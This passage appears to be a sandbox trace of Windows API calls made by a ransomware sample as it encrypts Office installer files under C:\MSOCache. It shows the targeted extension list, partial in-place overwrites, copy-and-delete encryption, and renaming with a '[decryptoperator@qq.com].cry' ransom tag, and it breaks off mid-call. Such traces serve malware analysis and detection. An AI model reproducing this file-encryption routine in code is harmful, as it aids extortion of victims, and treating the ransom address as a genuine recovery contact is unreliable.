Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0040.657] lstrlenW (lpString=".doc") returned 4 [0040.657] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0040.657] lstrlenW (lpString=".docx") returned 5 [0040.657] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0040.657] lstrlenW (lpString=".pdf") returned 4 [0040.657] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0040.657] lstrlenW (lpString=".xls") returned 4 [0040.657] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0040.657] lstrlenW (lpString=".xlsx") returned 5 [0040.657] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0040.657] lstrlenW (lpString=".ppt") returned 4 [0040.657] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0040.657] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0040.657] lstrlenW (lpString=".zip") returned 4 [0040.657] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0040.657] lstrlenW (lpString=".rar") returned 4 [0040.657] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0040.658] lstrlenW (lpString=".bz2") returned 4 [0040.658] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0040.658] lstrlenW (lpString=".7z") returned 3 [0040.658] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0040.658] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0040.658] lstrlenW (lpString=".dbf") returned 4 [0040.658] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0040.658] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0040.658] lstrlenW (lpString=".1cd") returned 4 [0040.658] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0040.658] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0040.658] lstrlenW (lpString=".jpg") returned 4 [0040.658] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0040.658] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0040.658] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0040.658] lstrlenW (lpString=".doc") returned 4 [0040.658] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0040.658] lstrlenW (lpString=".docx") returned 5 [0040.658] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0040.658] lstrlenW (lpString=".pdf") returned 4 [0040.658] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0040.658] lstrlenW (lpString=".xls") returned 4 [0040.658] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0040.658] lstrlenW (lpString=".xlsx") returned 5 [0040.658] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0040.658] lstrlenW (lpString=".ppt") returned 4 [0040.658] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0040.658] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0040.658] lstrlenW (lpString=".zip") returned 4 [0040.658] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0040.658] lstrlenW (lpString=".rar") returned 4 [0040.658] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0040.658] lstrlenW (lpString=".bz2") returned 4 [0040.658] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0040.658] lstrlenW (lpString=".7z") returned 3 [0040.658] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0040.658] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0040.658] lstrlenW (lpString=".dbf") returned 4 [0040.659] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0040.659] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0040.659] lstrlenW (lpString=".1cd") returned 4 [0040.659] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0040.659] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0040.659] lstrlenW (lpString=".jpg") returned 4 [0040.659] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0040.659] lstrcmpiW (lpString1=".cab", lpString2=".cry") returned -1 [0040.659] lstrlenW (lpString="Proof.cab") returned 9 [0040.659] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0040.679] GetFileSizeEx (in: hFile=0x1ac, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=13642474) returned 1 [0040.679] CloseHandle (hObject=0x1ac) returned 1 [0040.679] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab")) returned 0x2020 [0040.679] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.679] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0040.802] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0040.803] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0x0) returned 1 [0040.803] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0040.803] ReadFile (in: hFile=0x1ac, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.109] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x4563a3, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0041.109] ReadFile (in: hFile=0x1ac, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.181] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0041.182] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0xcc2aea, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0041.182] ReadFile (in: hFile=0x1ac, lpBuffer=0x3bf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bf0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.212] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.212] WriteFile (in: hFile=0x1ac, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x301fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0041.225] SetEndOfFile (hFile=0x1ac) returned 1 [0041.225] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3ef0060 [0041.228] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0041.229] WriteFile (in: hFile=0x1ac, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0041.229] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x4563a3, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0041.229] WriteFile (in: hFile=0x1ac, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0041.230] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0xcc2aea, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0041.230] WriteFile (in: hFile=0x1ac, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0041.231] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3ef0060 | out: hHeap=0x600000) returned 1 [0041.231] CloseHandle (hObject=0x1ac) returned 1 [0042.806] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0042.806] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0042.806] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0042.806] lstrlenW (lpString=".doc") returned 4 [0042.806] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0042.806] lstrlenW (lpString=".docx") returned 5 [0042.806] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1 [0042.806] lstrlenW (lpString=".pdf") returned 4 [0042.806] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0042.806] lstrlenW (lpString=".xls") returned 4 [0042.806] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0042.807] lstrlenW (lpString=".xlsx") returned 5 [0042.807] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1 [0042.807] lstrlenW (lpString=".ppt") returned 4 [0042.807] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0042.807] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0042.807] lstrlenW (lpString=".zip") returned 4 [0042.807] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0042.807] lstrlenW (lpString=".rar") returned 4 [0042.807] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0042.807] lstrlenW (lpString=".bz2") returned 4 [0042.807] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0042.807] lstrlenW (lpString=".7z") returned 3 [0042.807] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0042.807] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0042.807] lstrlenW (lpString=".dbf") returned 4 [0042.807] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0042.807] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0042.807] lstrlenW (lpString=".1cd") returned 4 [0042.807] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0042.807] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0042.807] lstrlenW (lpString=".jpg") returned 4 [0042.807] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0042.807] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0042.807] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0042.807] lstrlenW (lpString=".doc") returned 4 [0042.807] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0042.807] lstrlenW (lpString=".docx") returned 5 [0042.807] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1 [0042.807] lstrlenW (lpString=".pdf") returned 4 [0042.807] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0042.807] lstrlenW (lpString=".xls") returned 4 [0042.807] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0042.807] lstrlenW (lpString=".xlsx") returned 5 [0042.807] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1 [0042.807] lstrlenW (lpString=".ppt") returned 4 [0042.807] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0042.807] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0042.807] lstrlenW (lpString=".zip") returned 4 [0042.808] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0042.808] lstrlenW (lpString=".rar") returned 4 [0042.808] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0042.808] lstrlenW (lpString=".bz2") returned 4 [0042.808] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0042.808] lstrlenW (lpString=".7z") returned 3 [0042.808] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0042.808] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0042.808] lstrlenW (lpString=".dbf") returned 4 [0042.808] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0042.808] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0042.808] lstrlenW (lpString=".1cd") returned 4 [0042.808] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0042.808] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0042.808] lstrlenW (lpString=".jpg") returned 4 [0042.808] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0042.808] lstrcmpiW (lpString1=".msi", lpString2=".cry") returned 1 [0042.808] lstrlenW (lpString="Office32MUI.msi") returned 15 [0042.808] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0042.808] GetFileSizeEx (in: hFile=0x1ac, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=873984) returned 1 [0042.808] CloseHandle (hObject=0x1ac) returned 1 [0042.808] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi")) returned 0x2020 [0042.808] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0042.809] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0042.809] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.809] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.809] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0042.809] GetLastError () returned 0x0 [0042.809] ReadFile (in: hFile=0x1ac, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0xd5600, lpOverlapped=0x0) returned 1 [0042.983] WriteFile (in: hFile=0x164, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xd5610, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0xd5610, lpOverlapped=0x0) returned 1 [0043.008] ReadFile (in: hFile=0x1ac, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.008] WriteFile (in: hFile=0x164, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0xf2, lpOverlapped=0x0) returned 1 [0043.009] SetEndOfFile (hFile=0x164) returned 1 [0043.009] CloseHandle (hObject=0x164) returned 1 [0043.134] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.134] SetEndOfFile (hFile=0x1ac) returned 1 [0043.140] CloseHandle (hObject=0x1ac) returned 1 [0043.140] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0043.140] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi")) returned 1 [0043.141] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0043.141] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0043.141] lstrlenW (lpString=".doc") returned 4 [0043.141] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0043.141] lstrlenW (lpString=".docx") returned 5 [0043.141] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0043.141] lstrlenW (lpString=".pdf") returned 4 [0043.141] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0043.141] lstrlenW (lpString=".xls") returned 4 [0043.141] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0043.141] lstrlenW (lpString=".xlsx") returned 5 [0043.141] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0043.141] lstrlenW (lpString=".ppt") returned 4 [0043.141] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0043.141] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0043.141] lstrlenW (lpString=".zip") returned 4 [0043.141] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0043.141] lstrlenW (lpString=".rar") returned 4 [0043.141] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0043.141] lstrlenW (lpString=".bz2") returned 4 [0043.141] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0043.141] lstrlenW (lpString=".7z") returned 3 [0043.141] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0043.141] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0043.141] lstrlenW (lpString=".dbf") returned 4 [0043.141] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0043.141] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0043.141] lstrlenW (lpString=".1cd") returned 4 [0043.141] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0043.141] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0043.141] lstrlenW (lpString=".jpg") returned 4 [0043.141] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0043.141] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0043.141] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0043.141] lstrlenW (lpString=".doc") returned 4 [0043.141] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0043.141] lstrlenW (lpString=".docx") returned 5 [0043.142] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0043.142] lstrlenW (lpString=".pdf") returned 4 [0043.142] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0043.142] lstrlenW (lpString=".xls") returned 4 [0043.142] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0043.142] lstrlenW (lpString=".xlsx") returned 5 [0043.142] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0043.142] lstrlenW (lpString=".ppt") returned 4 [0043.142] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0043.142] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0043.142] lstrlenW (lpString=".zip") returned 4 [0043.142] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0043.142] lstrlenW (lpString=".rar") returned 4 [0043.142] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0043.142] lstrlenW (lpString=".bz2") returned 4 [0043.142] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0043.142] lstrlenW (lpString=".7z") returned 3 [0043.142] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0043.142] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0043.142] lstrlenW (lpString=".dbf") returned 4 [0043.142] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0043.142] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0043.142] lstrlenW (lpString=".1cd") returned 4 [0043.142] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0043.142] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0043.142] lstrlenW (lpString=".jpg") returned 4 [0043.142] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0043.143] lstrcmpiW (lpString1=".cab", lpString2=".cry") returned -1 [0043.143] lstrlenW (lpString="OWOW32LR.cab") returned 12 [0043.143] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0043.143] GetFileSizeEx (in: hFile=0x1ac, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=2928955) returned 1 [0043.143] CloseHandle (hObject=0x1ac) returned 1 [0043.143] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab")) returned 0x2020 [0043.143] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0043.143] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0043.143] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, 